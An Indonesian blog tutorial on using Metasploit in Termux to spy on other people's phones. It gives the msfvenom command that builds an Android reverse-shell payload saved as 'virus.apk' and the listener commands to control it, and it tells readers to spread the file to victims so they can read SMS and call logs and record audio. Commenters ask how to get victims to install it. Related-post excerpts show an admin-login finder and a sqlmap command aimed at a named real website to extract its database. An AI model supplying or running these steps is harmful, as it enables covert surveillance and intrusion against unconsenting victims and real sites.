Langsung ke konten utama

Cara Menggunakan Metasploit di Termux



Metasploit adalah tools untuk menyadap hp seseorang.
Dengan tool ini kita dapat melihat isi SMS,log panggilan, screenshot gambar,merekam suara dan banyak lagi.

Untuk cara menggunakan nya sangat mudah 
Disini saya akan menjelaskan secara rinci tentang bagaimana cara menggunakan tool Metasploit.


Syaratnya kamu harus sudah menginstal aplikasi Termuda,dan menginstal tool Metasploit di termux kamu.
Jika belum silahkan download Termux di Play Store.

Jika kalian sudah install Termux nya tetapi belum menginstal tool Metasploit, silahkan lihat tutorial cara install Metasploit di Termux.

Jika Syarat nya sudah lengkap mari kita lanjutkan.

Buka aplikasi Termux kamu.
Pertama kita akan membuat payload/backdoor atau virus yang kita gunakan untuk dirimkan ke korban agar dapat akses ke HP nya.
Silahkan ketik: 

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP Kamu LPORT=8080 -o /sdcard/virus.apk



Lalu yang ditanda hijau isikan IP Address HP kamu.
Cara mengetahui IP address kita ketik ifconfig di Termux lalu enter.

Jika sudah menambahkan IP kamu,tinggal klik enter.

Tunggu hingga proses selesai.
Jika sudah,tampilan nya akan seperti gambar di bawah.






Jika proses pembuatan payload selesai selanjutnya kita ketik perintah.



1. msfconsole
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_tcp
4. set lhost IP kamu
5. set lport 8080
6. run
setelah itu,kita sebarkan payload yang sudah kita buat diawal tadi,agar diinstal di hp korban,anda juga bisa mencoba pada teman, saudara atau di hp sendiri.

 jika ada korban yang menginstal dan menjalankan virus tersebut,kita sudah dapat mengendalikan hp korban dengan perintah-perintah yang terdapat pada Metasploit.


Untuk mengetahui perintah yang dapat kita gunakan ketik help.

Sekian dari saya.
Terimakasih.




Komentar

  1. maksudnya apa sih awokawok

    BalasHapus
  2. Thank aplikasinya bro tapi g tau bekerja atau tidak

    Kira2 di hp gw akan g

    BalasHapus
  3. Payloadnya itu gmna cara sebarinnya ya bang, trus stelah kita buat ke save dimna payloadnya

    BalasHapus
  4. LPORTny di isi apa nomer apa sih kurang detail

    BalasHapus
    Balasan
    1. Iya saya bingung juga tuh di LPORT ada yg disi 4444,8080,1234,1010 aneh kan yg bener diisi apa

      Hapus
  5. kurang LPORTnya doang jadi whort it

    BalasHapus
  6. LPORTny di deskripsi 8080
    di gambar 4444 yng bnr mna

    BalasHapus
  7. Module nya kok gada command nya min?

    BalasHapus
  8. Bang itu kalo di kirim ke korban hp korban bisa mbaca kalo itu virus jadi nggk bisa nginstall. Terus cara nya gimana agar hp korban bisa nginstall ?

    BalasHapus

  9. Bro kan sikorban udah jalanin apk yg kita buat tpi kok gua masih gk bisa gua kendalalikan ya bro padahal uda gua masukin command di msfconsole dan seterusnya

    #itu knp ya

    BalasHapus
  10. LPORTnya diisi angka berapa?yang bener

    BalasHapus
  11. Bagi kalian yang gagal menjalankan METASPLOIT di termux padahal sudah mengikuti alur install paket sesuai postingan itu wajar saja paketnya tidak bekerja,kenapa ? Sebab METASPLOIT memang sangat berbahaya jika di salah gunakan sehingga admin yang memposting tules nya ada beberapa kalimat penulisan yang secara sengaja di "salahkan" dalam artian beberapa paket di atas kalimat huruf nya ada yang di lebih²kan atau di kurang²in,jadi sebenarnya paket di atas berjalan dengan sempurna tinggal kalian saja yang harus lebih teliti melihat huruf kalimat pada paket installer nya.
    Dan saya sendiri berhasil menginstall dan menjalankan METASPLOIT di termux lalu sudah saya uji coba dengan handphone saya sendiri,hasilnya ??? 100% Working perfectly.

    BalasHapus

Posting Komentar

Postingan populer dari blog ini

Cara install tools Admin Finder di Termux

Admin Finder adalah tools untuk mengetahui atau mencari lokasi login admin website. Soalnya saya pernah mendapatkan password dan username sebuah website,dan pada saat ingin login dan mencari tempat login nya ga nemu-nemu. Dan setelah mencari tau,akhirnya saya pun berjumpa dengan tools Admin Finder ini,dan sangat membantu sekali. Buat kalian yang susah nemuin login admin nya,pake aja tools ini. Mari kita install tools Admin Finder nya. Buka aplikasi Termux. Lalu ketikkan perintah: apt update && apt upgrade pkg install python2 pkg install php pkg install git git clone https://github.com/mdpunk/admin-finder Jika sudah terinstall,ketikkan perintah  cd admin-finder chmod +x adfin.php php adfin.php Tampilannya seperti gambar dibawah ini: Tinggal ketik url website yang ingin kalian tahu login admin nya. Sekian tutorial kali ini. Semoga bermanfaat dan terimakasih.

Cara mengetahui user dan password website menggunakan Sqlmap di Termux

Halo sobat. Kali ini saya akan memberikan tutorial cara mendapatkan username dan password sebuah website menggunakan Sqlmap di Termux. Jika kalian belum memiliki korban/website yang Vuln untuk di inject,silahkan anda menuju cara mencari website Vuln menggunakan Termux . Siapkan alat tempur Termux nya. Lalu jalankan tools Sqlmap. Jika kamu belum install tool Sqlmap nya,silahkan menuju  Cara install Sqlmap di Termux . Jika sudah install,silahkan langsung ketik perintah: cd sqlmap python2 sqlmap.py Jika sudah,tampilan nya akan seperti gambar dibawah: Setelah itu. Ketik perintah: python2 sqlmap.py -u http://website_korban.com/index.php?id=1 ---dbs Contoh: python2 sqlmap.py -u  https://www.hotelmetdelhi.com/pages.php\?id\=77 --dbs Lalu tekan Enter. Gambar: Perintah diatas adalah untuk mendapatkan nama Database website tersebut. -u adalah untuk URL website dan --dbs adalah untuk mendapatkan Database nya. Tunggu hingg